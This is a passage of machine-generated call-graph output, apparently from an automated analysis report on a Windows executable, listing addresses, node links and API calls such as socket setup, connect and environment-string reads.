API calls 92396->92397 92398 7ff7f131d14d 92397->92398 92399->92394 92400 7ff7f131d002 _isindst 92399->92400 92414 7ff7f1327cd0 92400->92414 92405 7ff7f131d15e 92407 7ff7f1303258 _invalid_parameter_noinfo_noreturn 17 API calls 92405->92407 92409 7ff7f131d172 92407->92409 92412 7ff7f131d05f 92412->92396 92439 7ff7f1327d14 47 API calls _isindst 92412->92439 92415 7ff7f131d020 92414->92415 92416 7ff7f1327cdf 92414->92416 92421 7ff7f13270d4 92415->92421 92441 7ff7f1318cb8 EnterCriticalSection 92416->92441 92422 7ff7f13270dd 92421->92422 92423 7ff7f131d035 92421->92423 92442 7ff7f130b5f0 11 API calls _Strcoll 92422->92442 92423->92405 92427 7ff7f1327104 92423->92427 92425 7ff7f13270e2 92443 7ff7f1303208 47 API calls _invalid_parameter_noinfo 92425->92443 92428 7ff7f132710d 92427->92428 92429 7ff7f131d046 92427->92429 92444 7ff7f130b5f0 11 API calls _Strcoll 92428->92444 92429->92405 92433 7ff7f1327134 92429->92433 92431 7ff7f1327112 92445 7ff7f1303208 47 API calls _invalid_parameter_noinfo 92431->92445 92434 7ff7f132713d 92433->92434 92435 7ff7f131d057 92433->92435 92446 7ff7f130b5f0 11 API calls _Strcoll 92434->92446 92435->92405 92435->92412 92437 7ff7f1327142 92447 7ff7f1303208 47 API calls _invalid_parameter_noinfo 92437->92447 92439->92396 92440->92396 92442->92425 92443->92423 92444->92431 92445->92429 92446->92437 92447->92435 92448 7ff7f1312d60 92449 7ff7f1312d90 92448->92449 92456 7ff7f1312b94 92449->92456 92452 7ff7f1312dcf 92454 7ff7f1312de4 92452->92454 92468 7ff7f1302e1c 47 API calls 2 library calls 92452->92468 92457 7ff7f1312beb 92456->92457 92466 7ff7f1312bbd 92456->92466 92458 7ff7f1312c04 92457->92458 92460 7ff7f1312c5b 92457->92460 92470 7ff7f130313c 47 API calls 3 library calls 92458->92470 92469 7ff7f131cbbc EnterCriticalSection 92460->92469 92466->92452 92467 7ff7f1302e1c 47 API calls 2 library calls 92466->92467 92467->92452 92468->92454 92470->92466 92471 7ff7f1309e24 92472 7ff7f1309e38 92471->92472 92473 7ff7f1309e4d 92471->92473 92488 7ff7f130b5f0 11 API calls _Strcoll 92472->92488 92473->92472 92474 7ff7f1309e52 92473->92474 92480 7ff7f130b0d8 92474->92480 92477 7ff7f1309e3d 92489 7ff7f1303208 47 API calls _invalid_parameter_noinfo 92477->92489 92478 7ff7f1309e48 92481 7ff7f130b108 92480->92481 92490 7ff7f130abe4 92481->92490 92485 7ff7f130b147 92487 7ff7f130b15c 92485->92487 92501 7ff7f1302e1c 47 API calls 2 library calls 92485->92501 92487->92478 92488->92477 92489->92478 92491 7ff7f130ac2e 92490->92491 92492 7ff7f130abff 92490->92492 92502 7ff7f13099c4 EnterCriticalSection 92491->92502 92503 7ff7f130313c 47 API calls 3 library calls 92492->92503 92496 7ff7f130ac1f 92496->92485 92500 7ff7f1302e1c 47 API calls 2 library calls 92496->92500 92500->92485 92501->92487 92503->92496 92504 7ff7f1282470 92505 7ff7f1282494 92504->92505 92507 7ff7f128249e 92504->92507 92507->92505 92508 7ff7f1282380 92507->92508 92510 7ff7f1282396 92508->92510 92509 7ff7f1282422 92509->92507 92511 7ff7f1309d80 78 API calls 92510->92511 92513 7ff7f1283700 92510->92513 92511->92509 92514 7ff7f1309d80 92513->92514 92515 7ff7f1309ad0 78 API calls 92514->92515 92517 7ff7f1309dce 92515->92517 92516 7ff7f1309df4 92519 7ff7f1309e09 92516->92519 92522 7ff7f1302e1c 47 API calls 2 library calls 92516->92522 92517->92516 92521 7ff7f1302e1c 47 API calls 2 library calls 92517->92521 92519->92509 92521->92516 92522->92519 92523 7ff7f1283730 92524 7ff7f1283743 92523->92524 92525 7ff7f128374d 92524->92525 92528 7ff7f130a5e8 92524->92528 92529 7ff7f130a618 92528->92529 92536 7ff7f130a378 92529->92536 92532 7ff7f130a656 92534 7ff7f1283774 92532->92534 92548 7ff7f1302e1c 47 API calls 2 library calls 92532->92548 92537 7ff7f130a3e2 92536->92537 92538 7ff7f130a3a2 92536->92538 92537->92538 92540 7ff7f130a3ee 92537->92540 92550 7ff7f130313c 47 API calls 3 library calls 92538->92550 92549 7ff7f13099c4 EnterCriticalSection 92540->92549 92542 7ff7f130a3c9 92542->92532 92547 7ff7f1302e1c 47 API calls 2 library calls 92542->92547 92547->92532 92548->92534 92550->92542 92551 7ff7f1283570 92554 7ff7f1282f00 92551->92554 92553 7ff7f12835f1 92555 7ff7f1282f1e 92554->92555 92557 7ff7f1282f2d 92554->92557 92555->92553 92556 7ff7f1282f45 92556->92553 92557->92556 92558 7ff7f12834bb 92557->92558 92561 7ff7f1285400 11 API calls 92557->92561 92558->92556 92562 7ff7f12810f0 48 API calls 92558->92562 92561->92558 92562->92556 92563 7ff7f129c642 92581 7ff7f12ae840 92563->92581 92565 7ff7f129c6a1 92567 7ff7f129c6c1 92565->92567 92598 7ff7f129bd60 165 API calls 92565->92598 92571 7ff7f129c260 92567->92571 92599 7ff7f12b2810 10 API calls _Strcoll 92567->92599 92570 7ff7f129d464 92571->92570 92574 7ff7f129bce0 84 API calls 92571->92574 92577 7ff7f12af6f0 84 API calls 92571->92577 92578 7ff7f129a0d0 84 API calls 92571->92578 92596 7ff7f12b2810 10 API calls _Strcoll 92571->92596 92600 7ff7f129bd60 165 API calls 92571->92600 92601 7ff7f12a5110 94 API calls 92571->92601 92602 7ff7f12c3ec0 QueryPerformanceCounter GetTickCount 92571->92602 92603 7ff7f12c3d80 86 API calls 92571->92603 92574->92571 92575 7ff7f129c654 92575->92565 92597 7ff7f129bce0 84 API calls 92575->92597 92577->92571 92578->92571 92586 7ff7f12ae88b 92581->92586 92593 7ff7f12ae87e 92581->92593 92582 7ff7f12ae945 92583 7ff7f12ae9eb 92582->92583 92585 7ff7f12ae950 92582->92585 92619 7ff7f12af510 8 API calls _Strcoll 92583->92619 92587 7ff7f12ae9b6 92585->92587 92585->92593 92612 7ff7f12b6cb0 92585->92612 92586->92593 92604 7ff7f12b1d90 92586->92604 92617 7ff7f12af510 8 API calls _Strcoll 92587->92617 92589 7ff7f12ae9c2 92590 7ff7f12baae0 2 API calls 92589->92590 92591 7ff7f12ae9cc 92590->92591 92618 7ff7f12aa9b0 84 API calls 92591->92618 92593->92575 92596->92571 92597->92565 92598->92567 92599->92571 92600->92571 92601->92571 92602->92571 92603->92571 92605 7ff7f12b1db7 92604->92605 92606 7ff7f12b1dc9 92604->92606 92605->92582 92607 7ff7f12b1e53 92606->92607 92609 7ff7f12b1e68 92606->92609 92610 7ff7f12b212c 92606->92610 92608 7ff7f12af830 82 API calls 92607->92608 92608->92609 92609->92582 92620 7ff7f12af6f0 84 API calls 2 library calls 92610->92620 92613 7ff7f12b6cca 92612->92613 92614 7ff7f12b6cd3 92612->92614 92613->92614 92621 7ff7f12b8640 92613->92621 92614->92585 92616 7ff7f12b6d24 92616->92585 92617->92589 92618->92593 92619->92593 92620->92609 92622 7ff7f12b8677 92621->92622 92623 7ff7f12b8717 92621->92623 92622->92623 92624 7ff7f12b8692 getsockname 92622->92624 92625 7ff7f12fa740 _Strcoll 8 API calls 92623->92625 92626 7ff7f12b86e5 WSAGetLastError 92624->92626 92627 7ff7f12b871e 92624->92627 92628 7ff7f12b87a0 92625->92628 92641 7ff7f12c5ab0 53 API calls 2 library calls 92626->92641 92643 7ff7f12b21f0 92627->92643 92628->92616 92631 7ff7f12b8702 92642 7ff7f12af6f0 84 API calls 2 library calls 92631->92642 92632 7ff7f12b873a 92632->92623 92654 7ff7f130b5f0 11 API calls _Strcoll 92632->92654 92635 7ff7f12b874b 92655 7ff7f130b5f0 11 API calls _Strcoll 92635->92655 92637 7ff7f12b8752 92656 7ff7f12c5ab0 53 API calls 2 library calls 92637->92656 92639 7ff7f12b876a 92657 7ff7f12af6f0 84 API calls 2 library calls 92639->92657 92641->92631 92642->92623 92644 7ff7f12b2281 92643->92644 92645 7ff7f12b2214 92643->92645 92646 7ff7f12b229e 92644->92646 92660 7ff7f12c7670 8 API calls 92644->92660 92647 7ff7f12b225b 92645->92647 92658 7ff7f12ec1f0 19 API calls _Strcoll 92645->92658 92646->92632 92659 7ff7f130b5f0 11 API calls _Strcoll 92647->92659 92651 7ff7f12b222f 92651->92647 92653 7ff7f12b2234 htons 92651->92653 92652 7ff7f12b2269 92652->92632 92653->92632 92654->92635 92655->92637 92656->92639 92657->92623 92658->92651 92659->92652 92660->92646 92661 7ff7f12b6560 92662 7ff7f12b659e 92661->92662 92678 7ff7f12b65a3 92661->92678 92663 7ff7f12b6722 92662->92663 92662->92678 92701 7ff7f12b80a0 92662->92701 92665 7ff7f12c4dc0 19 API calls 92663->92665 92664 7ff7f12fa740 _Strcoll 8 API calls 92667 7ff7f12b67fc 92664->92667 92668 7ff7f12b673b 92665->92668 92670 7ff7f12b6741 92668->92670 92671 7ff7f12b6758 92668->92671 92673 7ff7f12af830 82 API calls 92670->92673 92675 7ff7f12b6790 92671->92675 92681 7ff7f12b676a 92671->92681 92672 7ff7f12b6669 92674 7ff7f12b66ed 92672->92674 92672->92678 92680 7ff7f12b8640 92 API calls 92672->92680 92673->92678 92674->92678 92776 7ff7f12b87c0 closesocket 92674->92776 92771 7ff7f12b8980 SleepEx getsockopt 92675->92771 92676 7ff7f12b65f6 connect 92677 7ff7f12b660e WSAGetLastError 92676->92677 92682 7ff7f12b8640 92 API calls 92677->92682 92678->92664 92685 7ff7f12b6687 WSASetLastError 92680->92685 92681->92672 92686 7ff7f12b8980 3 API calls 92681->92686 92687 7ff7f12b6622 92682->92687 92775 7ff7f12c5ab0 53 API calls 2 library calls 92685->92775 92686->92672 92690 7ff7f12af830 82 API calls 92687->92690 92688 7ff7f12b67ab 92691 7ff7f12baae0 2 API calls 92688->92691 92694 7ff7f12b6645 92690->92694 92695 7ff7f12b67b5 92691->92695 92692 7ff7f12b66b5 92693 7ff7f12af7e0 84 API calls 92692->92693 92693->92674 92694->92663 92696 7ff7f12b6657 92694->92696 92697 7ff7f12b8640 92 API calls 92695->92697 92774 7ff7f12b8850 89 API calls _Strcoll 92696->92774 92699 7ff7f12b67ca 92697->92699 92700 7ff7f12af830 82 API calls 92699->92700 92700->92678 92702 7ff7f12baae0 2 API calls 92701->92702 92703 7ff7f12b80de 92702->92703 92777 7ff7f12b88e0 92703->92777 92705 7ff7f12b80ff 92706 7ff7f12b21f0 20 API calls 92705->92706 92764 7ff7f12b816e 92705->92764 92708 7ff7f12b8123 92706->92708 92710 7ff7f12b81db 92708->92710 92711 7ff7f12b812b 92708->92711 92709 7ff7f12af830 82 API calls 92712 7ff7f12b81b2 92709->92712 92714 7ff7f12b8212 92710->92714 92715 7ff7f12b81e4 setsockopt 92710->92715 92781 7ff7f130b5f0 11 API calls _Strcoll 92711->92781 92713 7ff7f12fa740 _Strcoll 8 API calls 92712->92713 92718 7ff7f12b65c4 92713->92718 92720 7ff7f12af7e0 84 API calls 92714->92720 92715->92714 92717 7ff7f12b8130 92782 7ff7f130b5f0 11 API calls _Strcoll 92717->92782 92718->92672 92718->92676 92718->92677 92718->92678 92722 7ff7f12b822f 92720->92722 92721 7ff7f12b813d 92783 7ff7f130b5f0 11 API calls _Strcoll 92721->92783 92726 7ff7f12b824f setsockopt 92722->92726 92740 7ff7f12b82a6 92722->92740 92724 7ff7f12b8144 92784 7ff7f12c5ab0 53 API calls 2 library calls 92724->92784 92728 7ff7f12b827c WSAGetLastError 92726->92728 92726->92740 92727 7ff7f12b8159 92785 7ff7f12af6f0 84 API calls 2 library calls 92727->92785 92787 7ff7f12c5ab0 53 API calls 2 library calls 92728->92787 92729 7ff7f12ed430 20 API calls 92737 7ff7f12b82ed 92729->92737 92731 7ff7f12b830e getsockopt 92733 7ff7f12b833f setsockopt 92731->92733 92734 7ff7f12b8335 92731->92734 92735 7ff7f12b82f1 92733->92735 92734->92733 92734->92735 92738 7ff7f12b8376 setsockopt 92735->92738 92744 7ff7f12b84a5 92735->92744 92736 7ff7f12b8294 92739 7ff7f12af7e0 84 API calls 92736->92739 92737->92731 92737->92735 92741 7ff7f12b83a6 WSAGetLastError 92738->92741 92742 7ff7f12b83b8 92738->92742 92739->92740 92740->92729 92740->92737 92743 7ff7f12b8497 92741->92743 92746 7ff7f12b83c3 setsockopt 92742->92746 92748 7ff7f12af7e0 84 API calls 92743->92748 92745 7ff7f12b8501 92744->92745 92747 7ff7f12b853a 92744->92747 92744->92764 92788 7ff7f12b7ac0 190 API calls 2 library calls 92745->92788 92749 7ff7f12b8407 92746->92749 92750 7ff7f12b83ec WSAGetLastError 92746->92750 92780 7ff7f12ed920 ioctlsocket 92747->92780 92748->92744 92756 7ff7f12b8412 setsockopt 92749->92756 92753 7ff7f12af7e0 84 API calls 92750->92753 92753->92749 92754 7ff7f12b8547 92757 7ff7f12b8562 92754->92757 92758 7ff7f12b854b WSAGetLastError 92754->92758 92755 7ff7f12b8521 92755->92747 92759 7ff7f12b8527 92755->92759 92760 7ff7f12b8456 92756->92760 92761 7ff7f12b843b WSAGetLastError 92756->92761 92762 7ff7f12b8579 92757->92762 92757->92764 92758->92764 92759->92764 92765 7ff7f12b8461 setsockopt 92760->92765 92763 7ff7f12af7e0 84 API calls 92761->92763 92766 7ff7f12b8640 92 API calls 92762->92766 92770 7ff7f12b818e 92762->92770 92763->92760 92764->92770 92786 7ff7f12b87c0 closesocket 92764->92786 92765->92744 92767 7ff7f12b848a WSAGetLastError 92765->92767 92768 7ff7f12b858d 92766->92768 92767->92743 92769 7ff7f12baae0 2 API calls 92768->92769 92769->92770 92770->92709 92772 7ff7f12b89d1 WSAGetLastError 92771->92772 92773 7ff7f12b67a3 92771->92773 92772->92773 92773->92672 92773->92688 92774->92672 92775->92692 92776->92678 92778 7ff7f12b892a socket 92777->92778 92779 7ff7f12b8902 92777->92779 92778->92779 92779->92705 92780->92754 92781->92717 92782->92721 92783->92724 92784->92727 92785->92764 92786->92770 92787->92736 92788->92755 92789 7ff7f129c824 92790 7ff7f129c839 92789->92790 92791 7ff7f129c883 92790->92791 92792 7ff7f129c8ae 92790->92792 92976 7ff7f12af6f0 84 API calls 2 library calls 92791->92976 92794 7ff7f129c903 92792->92794 92809 7ff7f129c619 92792->92809 92826 7ff7f12bd310 92792->92826 92875 7ff7f12bd307 92792->92875 92924 7ff7f12bd1e0 92792->92924 92796 7ff7f129ca0f 92794->92796 92797 7ff7f129c912 92794->92797 92795 7ff7f129c892 92977 7ff7f129bd60 165 API calls 92795->92977 92801 7ff7f129cac1 92796->92801 92802 7ff7f129ca2a 92796->92802 92798 7ff7f129c91f 92797->92798 92799 7ff7f129c9bb 92797->92799 92798->92809 92978 7ff7f129bd60 165 API calls 92798->92978 92799->92809 92979 7ff7f12c3a30 QueryPerformanceCounter GetTickCount 92799->92979 92801->92809 92983 7ff7f129bd60 165 API calls 92801->92983 92980 7ff7f12b9e30 84 API calls 92802->92980 92805 7ff7f129ca3c 92981 7ff7f129bd60 165 API calls 92805->92981 92821 7ff7f129c260 92809->92821 92984 7ff7f12b2810 10 API calls _Strcoll 92809->92984 92810 7ff7f129d464 92811 7ff7f129ca54 92811->92809 92982 7ff7f12b94a0 85 API calls 92811->92982 92817 7ff7f129bce0 84 API calls 92817->92821 92818 7ff7f12af6f0 84 API calls 92818->92821 92819 7ff7f129a0d0 84 API calls 92819->92821 92821->92810 92821->92817 92821->92818 92821->92819 92975 7ff7f12b2810 10 API calls _Strcoll 92821->92975 92985 7ff7f129bd60 165 API calls 92821->92985 92986 7ff7f12a5110 94 API calls 92821->92986 92987 7ff7f12c3ec0 QueryPerformanceCounter GetTickCount 92821->92987 92988 7ff7f12c3d80 86 API calls 92821->92988 92827 7ff7f12bd320 92826->92827 92830 7ff7f12bd34d 92827->92830 93048 7ff7f12c75a0 8 API calls 92827->93048 92829 7ff7f12fa740 _Strcoll 8 API calls 92831 7ff7f12bda2f 92829->92831 92833 7ff7f12bd410 92830->92833 92835 7ff7f12bd3a4 92830->92835 92870 7ff7f12bd55d 92830->92870 93049 7ff7f12c1ff0 132 API calls _vfwprintf_l 92830->93049 92831->92794 92833->92835 92861 7ff7f12bd416 92833->92861 93050 7ff7f12c1ff0 132 API calls _vfwprintf_l 92833->93050 92837 7ff7f12bd4fb 92835->92837 92835->92861 93051 7ff7f12c75a0 8 API calls 92835->93051 92841 7ff7f12bd551 92837->92841 92837->92870 93052 7ff7f12c75a0 8 API calls 92837->93052 92841->92870 92989 7ff7f12c0560 92841->92989 92842 7ff7f12bd58a 92843 7ff7f12bd5ef 92842->92843 92844 7ff7f12bd60f 92842->92844 92847 7ff7f12bd646 92842->92847 92842->92861 93053 7ff7f12c75a0 8 API calls 92843->93053 92844->92870 93002 7ff7f12a0410 92844->93002 92847->92844 92850 7ff7f12bd68b 92847->92850 92851 7ff7f12bd6a4 92847->92851 93055 7ff7f12c75a0 8 API calls 92850->93055 93054 7ff7f12c75a0 8 API calls 92851->93054 92853 7ff7f12bd763 92856 7ff7f12bd7a9 92853->92856 92853->92861 93056 7ff7f12c75a0 8 API calls 92853->93056 92857 7ff7f12a0410 8 API calls 92856->92857 92856->92870 92858 7ff7f12bd94c 92857->92858 92858->92861 92858->92870 93014 7ff7f12beb60 92858->93014 92860 7ff7f12bd9c8 92860->92861 92874 7ff7f12bdb29 SimpleString::operator= 92860->92874 93057 7ff7f12c6a90 48 API calls 92860->93057 92861->92870 93059 7ff7f12af6f0 84 API calls 2 library calls 92861->93059 92864 7ff7f12bd9ef 92866 7ff7f12bd9f5 92864->92866 92872 7ff7f12bda4a 92864->92872 92865 7ff7f12bdb4a 92865->92861 93028 7ff7f12c0100 92865->93028 93058 7ff7f12af6f0 84 API calls 2 library calls 92866->93058 92869 7ff7f12bdb5f 92869->92861 93038 7ff7f12a1590 92869->93038 92870->92829 92872->92870 92872->92874 93060 7ff7f12c7670 8 API calls 92872->93060 92874->92861 93024 7ff7f12bde50 92874->93024 92876 7ff7f12bd320 92875->92876 92880 7ff7f12bd34d 92876->92880 93088 7ff7f12c75a0 8 API calls 92876->93088 92878 7ff7f12bd55d 92879 7ff7f12fa740 _Strcoll 8 API calls 92878->92879 92881 7ff7f12bda2f 92879->92881 92880->92878 92883 7ff7f12bd410 92880->92883 92886 7ff7f12bd3a4 92880->92886 93089 7ff7f12c1ff0 132 API calls _vfwprintf_l 92880->93089 92881->92794 92885 7ff7f12bd416 92883->92885 92883->92886 93090 7ff7f12c1ff0 132 API calls _vfwprintf_l 92883->93090 92885->92878 93099 7ff7f12af6f0 84 API calls 2 library calls 92885->93099 92886->92885 92888 7ff7f12bd4fb 92886->92888 93091 7ff7f12c75a0 8 API calls 92886->93091 92888->92878 92892 7ff7f12bd551 92888->92892 93092 7ff7f12c75a0 8 API calls 92888->93092 92891 7ff7f12c0560 84 API calls 92893 7ff7f12bd58a 92891->92893 92892->92878 92892->92891 92893->92885 92894 7ff7f12bd5ef 92893->92894 92895 7ff7f12bd60f 92893->92895 92898 7ff7f12bd646 92893->92898 93093 7ff7f12c75a0 8 API calls 92894->93093 92895->92878 92897 7ff7f12a0410 8 API calls 92895->92897 92899 7ff7f12bd74a 92897->92899 92898->92895 92901 7ff7f12bd68b 92898->92901 92902 7ff7f12bd6a4 92898->92902 92899->92885 92900 7ff7f12c0730 8 API calls 92899->92900 92904 7ff7f12bd763 92900->92904 93095 7ff7f12c75a0 8 API calls 92901->93095 93094 7ff7f12c75a0 8 API calls 92902->93094 92904->92885 92907 7ff7f12bd7a9 92904->92907 93096 7ff7f12c75a0 8 API calls 92904->93096 92907->92878 92908 7ff7f12a0410 8 API calls 92907->92908 92909 7ff7f12bd94c 92908->92909 92909->92878 92909->92885 92910 7ff7f12beb60 85 API calls 92909->92910 92911 7ff7f12bd9c8 92910->92911 92911->92885 92923 7ff7f12bdb29 SimpleString::operator= 92911->92923 93097 7ff7f12c6a90 48 API calls 92911->93097 92913 7ff7f12bde50 8 API calls 92915 7ff7f12bdb4a 92913->92915 92914 7ff7f12bd9ef 92916 7ff7f12bd9f5 92914->92916 92921 7ff7f12bda4a 92914->92921 92915->92885 92918 7ff7f12c0100 84 API calls 92915->92918 93098 7ff7f12af6f0 84 API calls 2 library calls 92916->93098 92919 7ff7f12bdb5f 92918->92919 92919->92885 92920 7ff7f12a1590 93 API calls 92919->92920 92920->92885 92921->92878 92921->92923 93100 7ff7f12c7670 8 API calls 92921->93100 92923->92885 92923->92913 92925 7ff7f12bd232 92924->92925 92961 7ff7f12bd416 92925->92961 92970 7ff7f12bd249 92925->92970 93101 7ff7f12bf930 92925->93101 92928 7ff7f12fa740 _Strcoll 8 API calls 92929 7ff7f12bda2f 92928->92929 92929->92794 92930 7ff7f12bd26d 92932 7ff7f12bd34d 92930->92932 92930->92961 93111 7ff7f12c75a0 8 API calls 92930->93111 92934 7ff7f12bd410 92932->92934 92936 7ff7f12bd3a4 92932->92936 92932->92970 93112 7ff7f12c1ff0 132 API calls _vfwprintf_l 92932->93112 92934->92936 92934->92961 93113 7ff7f12c1ff0 132 API calls _vfwprintf_l 92934->93113 92937 7ff7f12bd4fb 92936->92937 92936->92961 93114 7ff7f12c75a0 8 API calls 92936->93114 92941 7ff7f12bd551 92937->92941 92937->92970 93115 7ff7f12c75a0 8 API calls 92937->93115 92940 7ff7f12c0560 84 API calls 92942 7ff7f12bd58a 92940->92942 92941->92940 92941->92970 92943 7ff7f12bd5ef 92942->92943 92944 7ff7f12bd60f 92942->92944 92947 7ff7f12bd646 92942->92947 92942->92961 93116 7ff7f12c75a0 8 API calls 92943->93116 92946 7ff7f12a0410 8 API calls 92944->92946 92944->92970 92948 7ff7f12bd74a 92946->92948 92947->92944 92950 7ff7f12bd68b 92947->92950 92951 7ff7f12bd6a4 92947->92951 92949 7ff7f12c0730 8 API calls 92948->92949 92948->92961 92953 7ff7f12bd763 92949->92953 93118 7ff7f12c75a0 8 API calls 92950->93118 93117 7ff7f12c75a0 8 API calls 92951->93117 92956 7ff7f12bd7a9 92953->92956 92953->92961 93119 7ff7f12c75a0 8 API calls 92953->93119 92957 7ff7f12a0410 8 API calls 92956->92957 92956->92970 92958 7ff7f12bd94c 92957->92958 92959 7ff7f12beb60 85 API calls 92958->92959 92958->92961 92958->92970 92960 7ff7f12bd9c8 92959->92960 92960->92961 92974 7ff7f12bdb29 SimpleString::operator= 92960->92974 93120 7ff7f12c6a90 48 API calls 92960->93120 92961->92970 93122 7ff7f12af6f0 84 API calls 2 library calls 92961->93122 92963 7ff7f12bde50 8 API calls 92965 7ff7f12bdb4a 92963->92965 92964 7ff7f12bd9ef 92966 7ff7f12bd9f5 92964->92966 92972 7ff7f12bda4a 92964->92972 92965->92961 92968 7ff7f12c0100 84 API calls 92965->92968 93121 7ff7f12af6f0 84 API calls 2 library calls 92966->93121 92969 7ff7f12bdb5f 92968->92969 92969->92961 92971 7ff7f12a1590 93 API calls 92969->92971 92970->92928 92971->92961 92972->92970 92972->92974 93123 7ff7f12c7670 8 API calls 92972->93123 92974->92961 92974->92963 92975->92821 92976->92795 92977->92809 92978->92809 92979->92809 92980->92805 92981->92811 92982->92809 92983->92809 92984->92821 92985->92821 92986->92821 92987->92821 92988->92821 93061 7ff7f12c2410 92989->93061 92991 7ff7f12c05a0 92998 7ff7f12c05c9 92991->92998 92999 7ff7f12c06a2 92991->92999 92992 7ff7f12c057c 92992->92991 92993 7ff7f12c0648 92992->92993 93000 7ff7f12c0689 92992->93000 93070 7ff7f12af6f0 84 API calls 2 library calls 92993->93070 92995 7ff7f12c065e 92995->92842 92997 7ff7f12c0719 92997->92842 92998->93000 93001 7ff7f12af7e0 84 API calls 92998->93001 92999->93000 93071 7ff7f12af6f0 84 API calls 2 library calls 92999->93071 93000->92842 93001->93000 93082 7ff7f12c74e0 8 API calls 93002->93082 93004 7ff7f12a042d 93004->92861 93005 7ff7f12c0730 93004->93005 93006 7ff7f12c0780 93005->93006 93007 7ff7f12c0921 SimpleString::operator= 93005->93007 93006->93007 93010 7ff7f12c078d 93006->93010 93008 7ff7f12a0410 8 API calls 93007->93008 93009 7ff7f12c090a 93007->93009 93008->93009 93009->92853 93010->93009 93083 7ff7f12e4500 8 API calls _Strcoll 93010->93083 93012 7ff7f12c0844 SimpleString::operator= 93012->93009 93013 7ff7f12a0410 8 API calls 93012->93013 93013->93009 93018 7ff7f12beb91 93014->93018 93015 7ff7f12bedc5 93015->92860 93016 7ff7f12bebc4 93016->93015 93017 7ff7f12a0410 8 API calls 93016->93017 93017->93015 93018->93016 93084 7ff7f129efd0 85 API calls 93018->93084 93020 7ff7f12bec7b 93020->93016 93021 7ff7f12bee0f 93020->93021 93023 7ff7f12a0410 8 API calls 93020->93023 93022 7ff7f12af7e0 84 API calls 93021->93022 93022->93016 93023->93020 93026 7ff7f12bde7c 93024->93026 93025 7ff7f12be16f 93025->92865 93026->93025 93027 7ff7f12a0410 8 API calls 93026->93027 93027->93026 93029 7ff7f12c0128 93028->93029 93032 7ff7f12c012d 93028->93032 93085 7ff7f12edcc0 84 API calls 93029->93085 93031 7ff7f12c01a4 93034 7ff7f12a0410 8 API calls 93031->93034 93036 7ff7f12c035a 93031->93036 93037 7ff7f12c01f5 93031->93037 93032->93031 93033 7ff7f12a0410 8 API calls 93032->93033 93032->93036 93032->93037 93033->93031 93034->93031 93036->92869 93037->93036 93086 7ff7f12b0c90 84 API calls 93037->93086 93039 7ff7f12a16e7 93038->93039 93040 7ff7f12a15a6 93038->93040 93039->92861 93040->93039 93046 7ff7f12a15fb 93040->93046 93087 7ff7f12a1eb0 93 API calls 93040->93087 93042 7ff7f12a1643 93042->92861 93043 7ff7f12a16a8 93044 7ff7f12a1ba0 93 API calls 93043->93044 93045 7ff7f12a16be 93043->93045 93044->93045 93045->92861 93046->93042 93046->93043 93047 7ff7f12c98b0 84 API calls 93046->93047 93047->93043 93048->92830 93049->92833 93050->92835 93051->92837 93052->92841 93053->92844 93054->92844 93055->92844 93056->92856 93057->92864 93058->92861 93059->92870 93060->92874 93063 7ff7f12c242d 93061->93063 93062 7ff7f12c2543 93062->92992 93063->93062 93065 7ff7f12c2489 93063->93065 93072 7ff7f1296410 93063->93072 93066 7ff7f12c258b 93065->93066 93076 7ff7f12a2cd0 8 API calls 93065->93076 93066->92992 93068 7ff7f12c25f8 93068->93066 93077 7ff7f12a29f0 84 API calls 93068->93077 93070->92995 93071->92997 93074 7ff7f1296437 93072->93074 93073 7ff7f129643c 93073->93065 93074->93073 93078 7ff7f12a3620 93074->93078 93076->93068 93077->93066 93081 7ff7f12a3644 swprintf 93078->93081 93079 7ff7f12fa740 _Strcoll 8 API calls 93080 7ff7f12a37c1 93079->93080 93080->93074 93081->93079 93082->93004 93083->93012 93084->93020 93085->93032 93086->93036 93087->93046 93088->92880 93089->92883 93090->92886 93091->92888 93092->92892 93093->92895 93094->92895 93095->92895 93096->92907 93097->92914 93098->92885 93099->92878 93100->92923 93105 7ff7f12bf95b 93101->93105 93102 7ff7f12bfa3d 93103 7ff7f12bfa85 93102->93103 93104 7ff7f12bfb55 93102->93104 93124 7ff7f12c75a0 8 API calls 93103->93124 93126 7ff7f12c75a0 8 API calls 93104->93126 93105->93102 93108 7ff7f12bfabd 93105->93108 93109 7ff7f12bfa09 ctype 93105->93109 93108->92930 93109->93108 93125 7ff7f12c75a0 8 API calls 93109->93125 93111->92932 93112->92934 93113->92936 93114->92937 93115->92941 93116->92944 93117->92944 93118->92944 93119->92956 93120->92964 93121->92961 93122->92970 93123->92974 93124->93108 93125->93108 93126->93108 93127 7ff7f12a49b9 93132 7ff7f12a4530 93127->93132 93129 7ff7f12a468a 93130 7ff7f12a49c7 93130->93129 93131 7ff7f1303fbc 76 API calls 93130->93131 93131->93129 93133 7ff7f12a456b 93132->93133 93135 7ff7f12a45a1 93133->93135 93136 7ff7f12a457a 93133->93136 93142 7ff7f130a71c 47 API calls 2 library calls 93133->93142 93135->93136 93138 7ff7f12a3c60 93135->93138 93136->93130 93139 7ff7f12a3c8e 93138->93139 93141 7ff7f12a3c85 93138->93141 93139->93141 93143 7ff7f130a9d4 93139->93143 93141->93136 93142->93135 93146 7ff7f130a9f4 93143->93146 93147 7ff7f130a9ec 93146->93147 93148 7ff7f130aa1e 93146->93148 93147->93141 93148->93147 93149 7ff7f130aa6a 93148->93149 93150 7ff7f130aa2d __scrt_get_show_window_mode 93148->93150 93159 7ff7f13099c4 EnterCriticalSection 93149->93159 93160 7ff7f130b5f0 11 API calls _Strcoll 93150->93160 93154 7ff7f130aa42 93161 7ff7f1303208 47 API calls _invalid_parameter_noinfo 93154->93161 93160->93154 93161->93147 93162 7ff7f1313dd4 93163 7ff7f1313de4 93162->93163 93167 7ff7f1313ded 93162->93167 93163->93167 93168 7ff7f13138e4 93163->93168 93169 7ff7f13138f9 93168->93169 93170 7ff7f13138fd 93168->93170 93169->93167 93181 7ff7f1313ca4 12 API calls 3 library calls 93169->93181 93182 7ff7f1322d4c GetEnvironmentStringsW 93170->93182 93173 7ff7f131390a 93175 7ff7f131b6e0 __free_lconv_mon 11 API calls 93173->93175 93174 7ff7f1313916 93189 7ff7f1313a64 47 API calls 4 library calls 93174->93189 93175->93169 93177 7ff7f131391e 93178 7ff7f131b6e0 __free_lconv_mon 11 API calls 93177->93178 93179 7ff7f131393d 93178->93179 93180 7ff7f131b6e0 __free_lconv_mon 11 API calls 93179->93180 93180->93169 93181->93167 93183 7ff7f1322d70 93182->93183 93184 7ff7f1313902 93182->93184 93185 7ff7f131b604 wcsftime 12 API calls 93183->93185 93184->93173 93184->93174 93186 7ff7f1322da7 ctype 93185->93186 93187 7ff7f131b6e0 __free_lconv_mon 11 API calls 93186->93187 93188 